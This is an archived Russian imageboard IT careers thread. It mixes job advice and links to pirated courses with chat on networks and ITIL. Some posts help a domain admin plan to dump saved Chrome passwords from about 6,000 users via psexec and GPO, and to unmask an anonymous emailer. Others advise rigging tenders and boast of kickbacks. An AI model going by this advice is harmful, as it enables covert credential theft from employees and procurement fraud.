24 декабря Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна. Подробности случившегося. Мы призываем всех неравнодушных помочь нам с восстановлением утраченного контента!

IT-тред #74

 Аноним 12/12/17 Втр 21:14:41 #1 №1149761 
9.jpg
A.jpg
nightelfbyadyxxk-d6b5vlw.jpg
488773874.jpeg
Семьдесят четвертый тред системных администраторов, сетевиков, и причастных бизнес-аналитиков объявляется открытым!


Если у вас есть предложения по треду/шапке, ответьте комментом на этот пост. Ликуйте интересные обсуждения комментом в этот пост.


Начинающие! Если не хотите сидеть вечно на дне, то учите одно конкретное направление. Учить - это значит ебашить курсы и лабораторные по три-восемь часов в день каждый день, сдавать сертификационные экзамены, учить английский до беглого разговорного на IT тематику. Будете гонять балду - останетесь на дне.

В России IT нет, с небольшими исключениями ! Запомните это. В России в IT работать можно только в аутсорсерах на зарубежные компании, или в компаниях, которые выпускают IT продукты и сервисы, востребованные на мировом рынке. В остальных компаниях в России бюджеты на IT не большие, качество процессов внутри компании низкое, и это будет серьёзно влиять на ваше развитие.

Не ходите работать эникеями, не теряйте время. Пусть вашим первым опытом работы будет любая IT компания, и сразу идите на конкретную специализацию: линук админ, виндовс админ, сетевик, стораджист (storage admin), сервис деск (service desk) в конце концов. IT компания – это компания, где IT приносит основной доход, а не является обслуживающим подразделением. Провайдер, банк, контора разработчиков ПО - это IT компании. Завод, веб-студия, магазинная сеть – это не IT компании.

Уровень зарплат у состоявшихся квалифицированных специалистов с 8-10 годами опыта в Москве в IT – не менее 140000 руб., в идеале - 180-240 тыс.руб.

Переезжайте в другие города, если в вашем городе нет квалифицированной работы в IT. Меняйте компании легко, если у вас нет развития, не привязывайтесь к работадателям. Вы всегда себе работу найдёте, если у вас высокая квалификация. Подавайтесь на позиции и проходите собеседования по несколько раз в месяц, в том числе с фейковым именем и фейковым резюме. Не ссыте.

Готовьтесь к эмиграции. На всякий случай, не помешает. У вас одна из самых востребованных и гибких профессий. Попробуйте подаваться на вакансии зарубежом, посмотрите условия эмиграции (требования по закону и иммиграционным программам) и условия жизни.

Не тратьте много времени на женщин. Особенно, если они не разделяют ваших профессиональных интересов и тормозят ваше развитие, не дают переехать в другой город, и ебут мозг всяческими способами.

Бросьте игрушки и сериалы. Ибо нехуй. В отпуске поиграете и посмотрите.

Для программистов раздел /pr и тред "Мы вам перезвоним" в нём. Железо в /hw/, софт в /s/.


Для новичков: https://habrahabr.ru/post/118475/
RHCSA/RHCE:
magnet:?xt=urn:btih:C8915A6B4ED323C68FC0832E2FC37C2567464797&tr=http://bt3.t-ru.org/ann%3Fmagnet
magnet:?xt=urn:btih:A185A975BEAF0D33DCD2A1FADE9D885C1E85B7C8&tr=http://bt3.t-ru.org/ann%3Fmagnet
magnet:?xt=urn:btih:96C782EE746F06B9B7AF31ADE235B19725D242C8&tr=http://bt4.t-ru.org/ann%3Fmagnet
magnet:?xt=urn:btih:2DD6D93426A129913A48131E9C34A16AA05BCBE2&tr=http://bt2.t-ru.org/ann%3Fmagnet
RHCSA OpenStack: magnet:?xt=urn:btih:7C6B318ABE6D176F559AC569369D57A45BD34A36&tr=http://bt4.t-ru.org/ann%3Fmagnet
Тасклист для Linux админа: https://www.reddit.com/r/linuxadmin/comments/2s924h/how_did_you_get_your_start/cnnw1ma
Ютуб курс по Linux: https://www.youtube.com/user/itsemaev/playlists
Для сетевиков: http://xgu.ru/wiki/linkmeup
Курс CCNA: magnet:?xt=urn:btih:B0B3726CA5E04ECEC1937DBCF88BD733401BAF5D&dn=INE CCNA 200-120 videos 2014&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=http%3a%2f%2fretracker.hq.ertelecom.ru%2fannounce
Сети для самых маленьких: http://linkmeup.ru/blog/11.html
MCSA/MCSE: magnet:?xt=urn:btih:EB96F52705BC14A7BF5C7B66C4D995238C78724C&tr=http://bt4.t-ru.org/ann%3Fmagnet
Книги: https://yadi.sk/d/qv4eEa8D3K3wdu

>Все друзья юристы 300к в секунду, а я все хуй за печенье сосу
>Мы тут нищие все, как бичи. Плохо кушаем, сил нет даже перекот сделать
>OSPF и BGP просты как палка
>И все хотят разговорный английский!

tg: https://t.me/it2ch (самый старый канал IT-тредов, с февраля 2016)
tg: https://t.me/joinchat/AAAAAEK0kjV2GSZKAJGYqg (свежесозданная, с 9 марта 2017)

Старые треды:
Архив шапки треда и ссылки на треды с 2012 года и до 18.08.2017 - https://pastebin.com/bnfw44ED
https://arhivach.org/thread/197078/ - 12.08.2016-30.08.2016 IT-тред #58 (#694827 ресертификация CCNP и CCDA; #695065 техподдержка-кун уволен; #696256 учебные курсы и сертификация VMware VCP)
https://arhivach.org/thread/201391/ - 30.08.2016-18.09.2016 IT-тред #59 (#704591 техподдержка-кун устроился на работу #705495, #700375 кто-то страдает по BGP, #701024 порядок поиска справочной информации, #701185 попытка вката в профессию, #704529 куда идти после техподдержки провайдера, #706561 и 716508 - ещё сертификация VMware/network virtualization, #707228 лабы по Red Hat Storage/ceph/gluster, #707418 требования для джуниора сетевика, #708048 перекат из дотера в админы, #712657 собеседование мейл ру куна/сетевик, #713978 миниопросник сетевиков, #716450 что значит "знать Active Directory по-минимуму", #717116 надрочить технический английский)
https://arhivach.org/thread/206505/ - 18.09.2016-14.10.2016 IT-тред #60
https://arhivach.org/thread/211561/ - 14.10.2016-03.11.2016 IT-тред #61 (#758298 - дешёвые виртуалки для выполнения лабораторок по vmware esxi/linux/windows)
https://arhivach.org/thread/213360/ - 03.11.2016-08.12.2016 IT-тред #62 ANIMU EDITION
IT-тред #63 https://2ch.hk/wrk/arch/2017-01-27/res/807705.html, там ничего интересного, кроме техподдержки-куна (будет скопировано ниже)
https://arhivach.org/thread/233978/ - 27.01.2017-08.03.2017 IT-тред #64
https://arhivach.org/thread/254730/ - 08.03.2017-17.04.2017 IT-тред #65 (#941909 - как я попал в рабство (тру стори, старая паста), #941464 - дотер-админ и там ниже по тексту интересно по развитию для сетевиков с CCIE-куном, #947098 сбер/сбертех, #949508 собеседование сетевика в Тинькофф банк, #956919 экзамен CCNP Route, #958426 не ходите на говнокурсы, #959679 CCIE унижает учит, #970362 сторадж-админ в треде, #974087 ошибки на интервью, #976694 техподдержка-кун выкарабкивается в админы, так же в треде есть бензоколонка-кун и scom-кун, #996356 собеседование в интегратор на Linux, #998619 тут неплохие рекомендации для начинающего сетевика ниже по треду, в целом тред про техподдержку)
https://arhivach.org/thread/262500/ - 17.04.2017-18.05.2017 IT-тред #66 (#1001276 менять ли работу, если есть предложения, но есть совесть и незаконченные проекты на текущей работе)
https://arhivach.org/thread/270233/ - 18/05/17-23/07/17 IT-тред #67 (#1043372 скиллы DevOps'а)
https://arhivach.org/thread/282577/ - 24/06/17-28/07/17 IT-тред #68
https://arhivach.org/thread/286265/ - 29/07/17 IT-тред #69 (в треде много сетевиков и про зарплаты в IT, #1081068 триал openshift'а, #1086307 190к руб. в 2014м, #1086534 направления развития в системах виртуализации)
https://arhivach.org/thread/294287/ - 16/08/17 ИТ-тред №70 (копаем vpn)
http://arhivach.org/thread/295697/ - 10/09/17 ИТ-тред №71
http://arhivach.org/thread/308599/ - 08/10/17 ИТ-тред №72 - вкатываемся
http://arhivach.org/thread/321536/ - 73 тред, интересно поясняют про сеть #1148119, разбор L3 #1147437 по косточкам
Аноним 12/12/17 Втр 21:22:53 #2 №1149769 
8.jpg
18iy282587lxnpng.png
photo2017-12-1220-59-34.jpg
Аноним 12/12/17 Втр 23:23:46 #3 №1149840 
interfacemenu23000.jpg
Аноним 12/12/17 Втр 23:30:16 #4 №1149846 
Раньше было сразу видно IT-тред в названии, поменяй
Аноним 13/12/17 Срд 09:25:10 #5 №1149931 
Какое только говно не попадает в реестр Минсвязи...
Аноним 13/12/17 Срд 10:14:09 #6 №1149940 
Хочу админить Линукс. Какой порядок действий? Посмотреть/повторить все с Ютуб канала из шапки и потом просится работать за еду?
Аноним 13/12/17 Срд 10:29:53 #7 №1149943 
>>1149846
Да, зафейлил, поменяйте тему на IT-тред #74
Аноним 13/12/17 Срд 10:42:14 #8 №1149948 
15002860380740.jpg
15000222310300.jpg
Аноны, два вопроса на который сетевики не дадут ответа, и мне нужны виндузятники и/или ибшники:
1. Пришла анонимка с почтового ящика на яндексе, который уже удалён, как можно хоть что-то узнать об этом почтовом ящике, может IP адрес или ещё что-то
2. Как запустить удалённо программу в домене от УЗ текущего пользователя, есть программа-эксплойд, которая может выцеплять все сохранённые УЗ из хрома, но только из под юзера кому принадлежит этот хром
Аноним 13/12/17 Срд 11:11:01 #9 №1149959 
>>1149948
>2. Как запустить удалённо программу в домене от УЗ текущего пользователя
psexec, например.
Аноним 13/12/17 Срд 11:13:05 #10 №1149962 
>>1149959
>psexec
Он запускает или от система, или от пользователя которого ты задашь, или от пользователя от которого ты запустил, а надо от текущего залогиненного юзера
Сейчас пытаюсь слепить костыль из get-date и пользователя, а затем создать таск с отсрочкой на минуту от этого пользователя
Аноним 13/12/17 Срд 11:16:24 #11 №1149964 
>>1149940
>Хочу админить Линукс. Какой порядок действий? Посмотреть/повторить все с Ютуб канала из шапки и потом просится работать за еду?
именно так и сделай. Где-то там ещё была тема с reddit о пути линукс-админа. Вот там тоже полезные вещи.
Аноним 13/12/17 Срд 11:22:52 #12 №1149967 
>>1149962
План провалился, даже делая задачу от домен админа он просит пароль current user-а
Аноним 13/12/17 Срд 11:26:58 #13 №1149970 
>>1149967
А в автозагрузку вбросить? Логон-скрипт, таск, реестр этого пользователя? Раз уж обладаешь правами
>домен админа
Аноним 13/12/17 Срд 11:32:27 #14 №1149974 
>>1149970
в этом ещё одна хуйня, тупые юзеры не перезагружают свои компы годами, а удалённо сделать перезагрузку 6 тысяч станций - мне потом очко разорвут, так-то и планируется, но это работает с 1-10 ПК, когда перезагрузка на общем фоне не видна, но если я перезагружу 6к ПК, с удалёнными сессиями, открытыми "важными документами", то сначала все налетят на админов ВСУСа, а те переадресуют их ко мне, так как в секьюрити евентах будет висеть моя УЗ, которая посылала всем команду перезагрузки
Аноним 13/12/17 Срд 11:33:48 #15 №1149976 
>>1149970
Няша, кстати, держи
http://securityxploded.com/chrome-password-dump.php
Аноним 13/12/17 Срд 11:34:12 #16 №1149978 
И еще:
>>1149962
>а надо от текущего залогиненного юзера
>от пользователя которого ты задашь
Не вижу противоречий. Если целевой компьютер не сервер терминалов и на нем, соответственно, не разрешены множественные одновременные активные сеансы, то -
Разве программа, запущенная от имени пользователя [email protected] на компьютере, за которым в данный момент работает Алиса под именем мистера Сандерса своей учетной записью [email protected], будет выполняться не в текущем, а в отдельном сеансе пользователя [email protected]?
Аноним 13/12/17 Срд 11:35:13 #17 №1149980 
Пацаны, у кого есть биткоины?
Аноним 13/12/17 Срд 11:38:41 #18 №1149982 
>>1149980
У меня есть, немного. Но ты лучше в разделе криптовалюты спроси если что интересно.
Аноним 13/12/17 Срд 11:38:53 #19 №1149983 
>>1149978
Нет, она в taskmgr висит от удалённого пользователя

psexec -i 1 -s \\PC-NAME cmd.exe
запустит cmd в gui от имени системы
psexec -i 1 \\PC-NAME cmd.exe
запустит cmd в gui от имени твоей удалённой УЗ
Аноним 13/12/17 Срд 11:39:27 #20 №1149984 
Minergate.PNG
>>1149980
в /cc/, тоже могу ответить, сам майню
Аноним 13/12/17 Срд 11:42:16 #21 №1149985 
Последние пару дней в дс, все дела командировочные сделал. Делать особо нехуй сижу думаю куда сходить. Жалко анон начальник сетевиков так и не ответил. Лан значит не судьба.
Аноним 13/12/17 Срд 11:44:44 #22 №1149986 
>>1149985
>думаю куда сходить
сходи в третьяковку и пушкинский, и ещё можешь в ЦДХ, отвечаю, что годно
Аноним 13/12/17 Срд 11:48:58 #23 №1149987 
>>1149985
Погуляй по Александровскому саду, запишись в библиотек (там рядом), погуляй по Крайно площади и Зарядью.
Аноним 13/12/17 Срд 11:49:11 #24 №1149988 
>>1149983
psexec -u [email protected] -p BobIsFaggot!!!11 \\PC-NAME my1ittl3xpl0it.exe
Запустит от имени Алисы с правами Алисы? Получит доступ к хранилищу Алисы? Ах да, пароль надо знать, а администратор домена может и не знать пароль пользователя. Но может сбросить. Создать ситуацию, при которой сброс пароля необходим?
Аноним 13/12/17 Срд 11:52:36 #25 №1149990 
>>1149988
У нас необратимое шифрование пароле в домене, я не могу скинуть пароль на все 10к учёток, говорю же, что надо запустить на 6к станций
Кроме того, пока оно через foreach пройдёт первую сотню юзеры уже вернут свои пароли
Аноним 13/12/17 Срд 11:58:10 #26 №1149991 
>>1149990
Я вот не помню, приложение, назначенное к развертыванию в GPO на пользователя - оно только при логоне устанавливается, или может фоном в течение сеанса? Если да, то в MSI запихнуть и раздать.
Аноним 13/12/17 Срд 12:03:50 #27 №1149995 
>>1149991
Я последний раз пробовал деплоить так антивирус, оно делалось при логоне, и вангую, что он явно не деплоит от курент юзера, так как у юзера прав не хватит
Аноним 13/12/17 Срд 12:09:02 #28 №1149997 
>>1149995
Я последний раз так разворачивал навязанный сверху чатик. Был у этой конторы жаббер, всех устраивал, денег не просил, с АДом интегрировался - нет, понадобилось покупать этот. Всем всего хватало. Нет, не администраторы. Чятик раздавался в ветке политики пользователя. А вот когда - этого я уже не помню, да и не видел ни разу.
Аноним 13/12/17 Срд 12:16:45 #29 №1150001 
>>1149997
>в ветке политики пользователя
И тут нюанс такой. Установка-то, конечно, идет от системного пользователя, и чятик ставился не по десятку экземпляров на каждую жестянку, в каждый профиль. Но запускался-то потом в контексте пользователя. А вот если раздавать не "На пользователя" а "На компьютер", то после установки ничего не происходило.
Аноним 13/12/17 Срд 12:35:22 #30 №1150009 
>>1149990
Алсо, посмотри тут: https://community.spiceworks.com/topic/143030-launch-a-process-in-currently-logged-on-user-s-session-from-another-session
У чувака была проблема подобного рода. Раздавали приложение SCCM-ом, а с ним шрифты. И вот они не отображались, пока юзер не перелогинится.
Пишет, типа решил, хотя для такой хрени столько труда
>over the top.
Аноним 13/12/17 Срд 12:39:56 #31 №1150013 
>>1150009
А вот бложик этого чувака с кодом на VB.NET
https://blog.cjwdev.co.uk/2011/06/10/vb-net-start-process-in-console-session-from-windows-service-on-windows-7/
//В общем, у них там так же, как у нас: сам спросил - сам решил. Зато с уточкой поговорил.
Аноним 13/12/17 Срд 12:39:58 #32 №1150014 
дц.PNG
Господа сетевики. Я опять со своей резервной площадкой (ДЦ2) выхожу на связь.
Предлагаю обсудить дизайн резервной площадки в сети энтерпрайза. Пикрелейтед.
На данный момент есть ДЦ1, открывается ДЦ2.
Из костылей: Нам придется растянуть кластер межсетевых экранов на два ДЦ. Две ноды кластера будет в ДЦ1 и две ноды в ДЦ2.
И также собрать два vPC домена в Back-to-Back vPC через темную оптику.
Тоже самое и с роутерами, на которых вертится BGP и анонсиреют наши PI во внешний мир.
В итоге логически с точки зрения виртуалок на блейдовых серверах, это будет один ДЦ. И шлюзом для них выступает растянутый кластер межсетевых экранов. А для некоторых виртуалок шлюзом будет выступать HSRP на Nexus-ах. Тоже как бы растянутый на две площадки.
Ну и да, конечно же придется растянуть L2 домен на две площадки. Иначе никак.
Что скажете, кто-то видит подводные камни?
По поводу того, что вируталки из ДЦ2 будут выходить в инет через ДЦ1 — пофиг. Иначе мы сделать не можем ввиду особенностей инфраструктуры.
Аноним 13/12/17 Срд 12:52:30 #33 №1150022 
Cb3OdzeVAAEL4fH.jpg
>>1150009
>>1150013
Пошёл курить
Аноним 13/12/17 Срд 14:08:25 #34 №1150068 
Задроты, слушайте. Был я, значит, недоайтишником-недоасушником на крупном производственном предприятии. Делал все (не я один) - драйвера к железкам, реализация протоколов обмена всяких, малость автоматизации, малость линукса типа серверов под мелкие задачи, проксей там. Немного питона для работы и джавы для себя. Все околоайтишное говно, короче.

И дернул меня сатана за хуй вызваться на роль нового отдела IT (раньше отдела формально не было). Ну, в принципе, учитывая то, что выкатиться из IT-дна я хотел давно, меня почти все устраивает, работа стала несколько иной - закупки и прочее бюджетирование (4 филиала), договора, какие-то совещания, где IT не при хую вообще. Притом, что я ебашу и всю старую работу - ок, людей мало, я просто делаю больше работы за бОльшие деньги.

Но есть такая неприятная вещь - как ежемесячные планы работ, которые меня угнетают. Я не знаю, что там писать. IT на предприятии - это поддержка текущей инфраструктуры, работы дохуя, но в планы ее не запишешь. А руководство требует развития, типа отдел есть - должны быть и планы.

Хули делать? Я уже откатиться хочу назад. Из минусов делать ту же работу за меньшие деньги.
Аноним 13/12/17 Срд 14:14:01 #35 №1150073 
>>1150068
>отдел есть - должны быть и планы
реализация проекта по переносу доменных имён компании в новые регистрационные центры

Реализация логгирования событий с серверов предприятия

внедрение процессной карты выполнения заявок (itil)

поднятие информационного портала для IT отдела (вкики на апач)

Переход к закупкам оборудования единого вендора, например покупать все делл
Аноним 13/12/17 Срд 14:16:32 #36 №1150076 
>>1150068
>работы дохуя, но в планы ее не запишешь
Это какая же? А, понял, из разряда "Памахити усе сломалось!!!11".
Да, планирование аварийных ситуаций с точным количеством и временем и правда выглядит сомнительно. Следовательно, нужно указывать, мол, реагирование на инциденты по мере необходимости, по заявкам пользователей, по событиям мониторинга, по воле Б-га и ввиду неизбежных на море случайностей.
Аноним 13/12/17 Срд 14:18:59 #37 №1150078 
>>1150076
>реагирование на инциденты
И да, установи, правда что, показатели на количество таких инцидентов. И придумай план, как добиться неуклонного улучшения этих показателей, т.е. уменьшения количества инцидентов.
О как я могу!
Аноним 13/12/17 Срд 14:28:23 #38 №1150087 
>>1150073
>в новые регистрационные центры
Чем старые не устраивали? Где техническое и экономическое обоснование?
>Реализация логирования
Та-а-а-ак, а до сих пор не было?
>внедрение процессной карты выполнения заявок
Ты ж понимаешь, что здесь по-хорошему банда аналитиков нужна? Но дерзай, хуле. Если при этом в соответствии с картой заявка будет выполняться три дня вместо часа - пеняй на себя.
>поднятие информационного портала для IT отдела
В сочетании с предыдущим пунктом обязательно и параллельно. Категоризация и типизация заявок, разбивка на типовые задачи и решения, в случаях, интерактива не требующих - автоматизация решения.
>Переход к закупкам оборудования единого вендора
ФАС тебе за это жопку а-та-та.
Аноним 13/12/17 Срд 14:41:54 #39 №1150090 
>>1150087
>>в новые регистрационные центры
>Чем старые не устраивали? Где техническое и экономическое обоснование?
А кто у тебя будет спрашивать, там же ИТ отдел, скажи, что пинг будет короче, буд-то кто-то првоерит
>>Реализация логирования
>Та-а-а-ак, а до сих пор не было?
В единое место, в бесплатный SIEM или дополнить виндовые логи в ГПО
>>внедрение процессной карты выполнения заявок
>Ты ж понимаешь, что здесь по-хорошему банда аналитиков нужна? Но дерзай, хуле. Если при этом в соответствии с картой заявка будет выполняться три дня вместо часа - пеняй на себя.
>>поднятие информационного портала для IT отдела
>В сочетании с предыдущим пунктом обязательно и параллельно. Категоризация и типизация заявок, разбивка на типовые задачи и решения, в случаях, интерактива не требующих - автоматизация решения.
А зачем тебе делать там сроки, просто описывай процессы, кто проконтролирует как ты выполняешь по карте или без, это идеальный вариант, просто карта, пока без часов, или ставь заведомобольшие, и в следующем году покажешь оптимизацию процесса
>>Переход к закупкам оборудования единого вендора
>ФАС тебе за это жопку а-та-та.
если не гос, то похуй, если ГОС, то: поставщик в чьем названии присутствуют буквы "Л" "Е" "Д" "Л", и никакой фас тебя за жопу не возьмет, у нас все тендеры так работают

Ты ищешь проблемы там, где их нет
Аноним 13/12/17 Срд 14:51:01 #40 №1150091 
>>1149964
Как думаешь, за месяц реально осилить? В железе немного разбираюсь, Арч/генту поставить смогу, домашнюю сеть тоже смогу поднять, консольку уважаю, конфигов не боюсь. Собираюсь увольняться с дно работы после нг так что нужна работа, а айти мне очень нравится.
Аноним 13/12/17 Срд 14:54:00 #41 №1150092 
>>1150090
>поставщик в чьем названии присутствуют
Не прокатит. Вот именно так - не прокатит, на сорокматьегочетвертом я собаку съел. А вот по 223, кстати, может. Не все только работают по нему.
По 44 немного по-другому делается. Составляется техзадание, хорошее, подробное, с описанием всего, что только можно, избегая по возможности прямых указаний марки и/или торгового наименования ииии... как-то само собой получается, что этому ТЗ отвечает строго определенный товар. Да, расширенная поддержка на определенных условиях (carepack etc.) вряд ли пройдет, нарушается принцип однородности номенклатуры ТРУ: нельзя одним лотом заказывать ТРУ из разных разделов классификатора, в данном случае товар и услугу. Если процедура многолотовая, то можно. Но на разные лоты могут заявиться разные участники, такой нюанс.
Но вернемся к нашим баранам.
Несколько таких процедур - и мы имеем что-то вроде инфраструктуры, у которой есть определенные совершенно логичные требования к отдельным ее компонентам. И вот теперь можно абсолютно не стесняясь указывать оборудование конкретного производителя. Из соображений совместимости - это законно.
Аноним 13/12/17 Срд 14:55:02 #42 №1150093 
>>1150091
>Как думаешь, за месяц реально осилить? В железе немного разбираюсь, Арч/генту поставить смогу, домашнюю сеть тоже смогу поднять, консольку уважаю, конфигов не боюсь. Собираюсь увольняться с дно работы после нг так что нужна работа, а айти мне очень нравится.
За месяц? Вряд ли.
Лучше сосредоточиться на Debian или RedHat(CentOS). Должен уметь поставить, поднять разные сервисы (например, DNS, DHCP и тому подобное). Разбираться в Apache, nginx и уметь писать скрипты.
За месяц этого не осилить, по-моему.
Аноним 13/12/17 Срд 15:01:04 #43 №1150095 
>>1150090
>А зачем тебе делать там сроки
А вот тут ты, кажется, не понял. Я под словами
>заявка будет выполняться три дня вместо часа
имел в виду несколько другое.
Говорят, для любой в принципе решаемой задачи существует более одного рабочего решения, при этом из них не менее одного, которое работает через жопу.
Таким образом, можно составить карту процессов таким образом, что заявка, для выполнения которой ранее требовался звонок и полчаса-час работы, теперь будет выполняться три дня, с заполнением собственно заявки, ее согласованием, ебанием, категоризацией, перенаправлением, хуением, элевацией, эскалацией и хуяцией. Но можно и наоборот сделать, когда все красиво, не спорю. Просто первый пример у меня постоянно перед глазами.
Аноним 13/12/17 Срд 15:22:19 #44 №1150105 
>>1150073
>внедрение процессной карты выполнения заявок (itil)
Это не работает. Пытались внедрять уже два раза. В конечно итоге забивают хуй как источники заявки, так и исполнители. Хотя это нужно даже для СМК (система менеджмента качества). Чтобы это работало, нужно отключать к хуям телефоны отдела.
>поднятие информационного портала для IT отдела (вкики на апач)
Никто не будет читать, проще позвонить.
В конечном итоге ИТИЛ выльется в увеличение времени решения проблемы. А вот сократит ли количество завок в будущем - хз.
Аноним 13/12/17 Срд 15:32:43 #45 №1150115 
>>1150105
>Чтобы это работало, нужно отключать к хуям телефоны отдела.
Либо посадить хотя бы одного двух человек на прием заявок. При этом тикеты должны создаваться автоматически при поступлении входящего звонка на определенный номер.
Аноним 13/12/17 Срд 16:06:37 #46 №1150132 
>>1150105
>Это не работает. Пытались внедрять уже два раза
Ну это значит, что ты не работал в нормальном сервис деске
>>1150115
ага

Суть в том, чтобы делать линии обороны:
От много людей с малой квалификации на обезьяний труд до супер спецов, пример

Первая линия (приём и эскалация заявок, простейшие решения уровня перезагрузите)
Вторая линия (сетевики без сертификатов, которые перезагружают интерфейс, могут назначить ИП адрес, пару виндовс макак с делегированными правами в АД, чтобы добавлять группы)
Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)

По ITIL:


У тебя есть ВХОДНЫЕ ДАННЫЕ > Процесс (с вечной оптимизацией по SLA и KPI+KGI) > выход
все стандартные процессы, которые имеют свойство повторения больше 3-5 раз должны быть описаны и найден кратчайший путь выполнения, например

ВХОД: НУЖЕН ПРЕДОСТАВИТЬ ДОСТУП К ПОЧТЕ ДЛЯ ЧТЕНИЯ ЧУЖОГО ЯЩИКА
ПРОЦЕСС: ЭСКАЛИРОВАНИЕ НА СОГЛАСОВАНИЕ РУКОВОДИТЕЛЯ/ДИРЕКТОРА -> ПЕРЕНОС НА ГРУППУ АДМИНОВ -> ВЫПОЛНЕНИЕ
ВЫХОД: РЕЗУЛЬТАТ

Оптимизация, пример: отказаться от согласования для почты сотрудников ниже 5 грейда (ниже чем главные по тарелочкам)

Ну и всё в таком духе

https://www.youtube.com/watch?v=9ntALPk2fTE

Вообще ты бы поинтересовался вопросм, если не хочешь постоянно топтаться в одном болоте

Аноним 13/12/17 Срд 16:10:30 #47 №1150138 
>>1150132
>Вторая линия (сетевики без сертификатов, которые перезагружают интерфейс, могут назначить ИП адрес, пару виндовс макак с делегированными правами в АД, чтобы добавлять группы)
Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)
Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями
Аноним 13/12/17 Срд 16:31:49 #48 №1150153 
>>1150138
>Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями
В Infosystem JET, правда я там пара лет как уже не работаю
Аноним 13/12/17 Срд 16:34:33 #49 №1150156 
>>1150153
>В Infosystem JET, правда я там пара лет как уже не работаю
По подробнее.
Как-то метил туда. Ну и в другие интеграторы.
Мне всегда казалось, что я там буду писать эти всяческие ПЗ, ТКП и другие аббревиатуры в большей степени, а не сетями заниматься.
Документацией, короче говоря.

Да и денег мало платят. Меньше, чем в среднем энтерпрайзе. Думаю сейчас 90-100 на руки в Джете — стандарт. А то и меньше. И в серую.
Аноним 13/12/17 Срд 16:35:15 #50 №1150157 
>>1150153
>правда я там пара лет как уже не работаю
и почему ушел? И куда? В дургой интегратор или как? И если н5е в интегратор, то почему не в интегратор.
Аноним 13/12/17 Срд 16:41:24 #51 №1150163 
>>1150156
>умаю сейчас 90-100 на руки в Джете
Друг там CCNA у него 90к, сейчас вся ЗП белая, ещё в 2013 сделали белой, хотя ты прав, ниже чем по рынку, но нивелируют прочими плюхами: 3 дня в месяц без объяснения и справок (у нас все не ходили по пятницам, пидоры), свой врач и массажист, раньше был ДМС, премии, любая переработка = 1% от зп в час, то есть отработал в выходные смену 12 часов, получил 100% зп + 12% за один день, я когда работал брал себе все субботы, получал по 36-48% сверху. Когда я был не смотрели на опоздания, как пришёл, так пришёл, как ушёл так и ушёл, но работу делай

>>1150157
Ушёл в небольшую контору начальником ИТ отдела, так как из техпода предложили делать в одной фирме с ноля и сразу начальником, и не жалею, опыта получил очень много причём не только манагерского, получил хорошие знакомства у разных вендоров взяточки, откатики с партнёрскими программами и скидками, короче не жалею
Аноним 13/12/17 Срд 16:46:59 #52 №1150165 
брейвик.jpeg
Посоветуйте, например.
Отучился в вузике на инженера-системотехника, после 3 года работал на заводе инженером хуйни. Сейчас планирую опять вкатиться в ИТ по специальности: системным аналитиком или аналитиком данных, sql или что-то подобное.
Что чаще спрашивают на собеседовании? Что подучить? Куда посоветуете идти?
Аноним 13/12/17 Срд 16:50:16 #53 №1150168 
>>1150163
>Друг там CCNA у него 90к
что значит CCNA в данном контексте.
Я, наприме, CCNP. Но ты же понимаешь, что можно быть CCNP и даже CCIE, но ничерта не знать.
А можно вообще не сдавать на сертификаты, но быть гуру.
Аноним 13/12/17 Срд 16:51:43 #54 №1150171 
>>1150163
И да, это отдел какой?
Там есть сервисный центр, есть какие-то проектанты, не помню уже как называется. Сетевики там отдельно. Те, кто серверами занимается, тоже отдельно. Не помню уже аббпревиатуры.
Аноним 13/12/17 Срд 17:01:08 #55 №1150179 
>>1150168
> CCNP и даже CCIE, но ничерта не знать
Кстати, не видел таких, это которые дампают вопросы или пользуются багом сворачивания вопросов? Просто помню видео было такое, когда какой-то хуй сворачивает вопросы и смотрит ответы в интернете прямо на экзамене
Друг занимается уже готовой сетью, которое построило более высокое подразделение, сейчас, насколько я знаю, занимается и изменениями, но первоначальная сеть была не его
Насколько знаю На уровнях агрегации и доступа, про ядро не уверен.
Вот ребята которые строили сеть и более высокие сетевики, кстати там был парень с реальным знанием CCNP и даже без CCNA, но был в огромном почёте, занимаются только ядром и агрегацией до уровня доступа они уже не опускались почти никогда, и занимались проектированием сетей и подобными делами, хотя я был виндузовым админом и особо не лез в их работу

>>1150171
бля, я этого тоже не помню, это было сто лет назад, мы звали их сетевики, просто "кинь на сетевиков" и всё, они и в СД были как "сетевые инженеры" и что-то такое
Аноним 13/12/17 Срд 17:03:43 #56 №1150180 
>>1150105
>ИТИЛ
метил
Аноним 13/12/17 Срд 17:06:44 #57 №1150185 
>>1150180
Этил!
Аноним 13/12/17 Срд 17:34:04 #58 №1150202 
>>1149986
>>1149987
Спасибо анон, погулял. Правда до Третьяковки не дошёл, устал, завтра может схожу.
Аноним 13/12/17 Срд 18:14:28 #59 №1150225 
>>1150180
организация, запрещённая в РФ
Аноним 13/12/17 Срд 19:55:23 #60 №1150293 
>>1150179
>с реальным знанием CCNP и даже без CCNA, но был в огромном почёте
>занимаются только ядром и агрегацией
Почему все дрочат на CCNP, это же изи выучить и сдать. С дампами так вообще за пару месяцев решается. Охуеть ядро и агрегация. Чего там есть сложного вообще? Если это не провайдер, то это работа для джамшута.
Аноним 13/12/17 Срд 20:06:21 #61 №1150300 
>>1150293
Речь идёт о уровне знаний, те кто знаком с сертификацией сразу понимают о каком уровне идёт речь. Есть сертификат или нет без разницы. Просто это такой разговорный уровень для общения. Я например считаю что я близок к этому уровню знаний, а сдавать не хочу, жду когда они трек обновят.
Аноним 13/12/17 Срд 20:07:28 #62 №1150308 
>>1150293
>
>Почему все дрочат на CCNP, это же изи выучить и сдать.
Никто не дрочит на CCNP.
Более того, на CCIE никто тоже не дрочит.
Когда говорят CCAN|NP|IE, имеют ввиду тот перечень навыков, знаний и опыт работы, который предполагается знать человеку с соответствующим сертификатом. Имеют ввиду "знания на уровне..."
Аноним 13/12/17 Срд 20:09:18 #63 №1150311 
>>1150293
А насчет ядра и агрегации согласен. Работа для джамшута. Как и всё админство. Sad but true.
То ИТ, которым действительно надо заниматься, не имеет ничего общего с администрированием, веб-макакингом и кодингом.
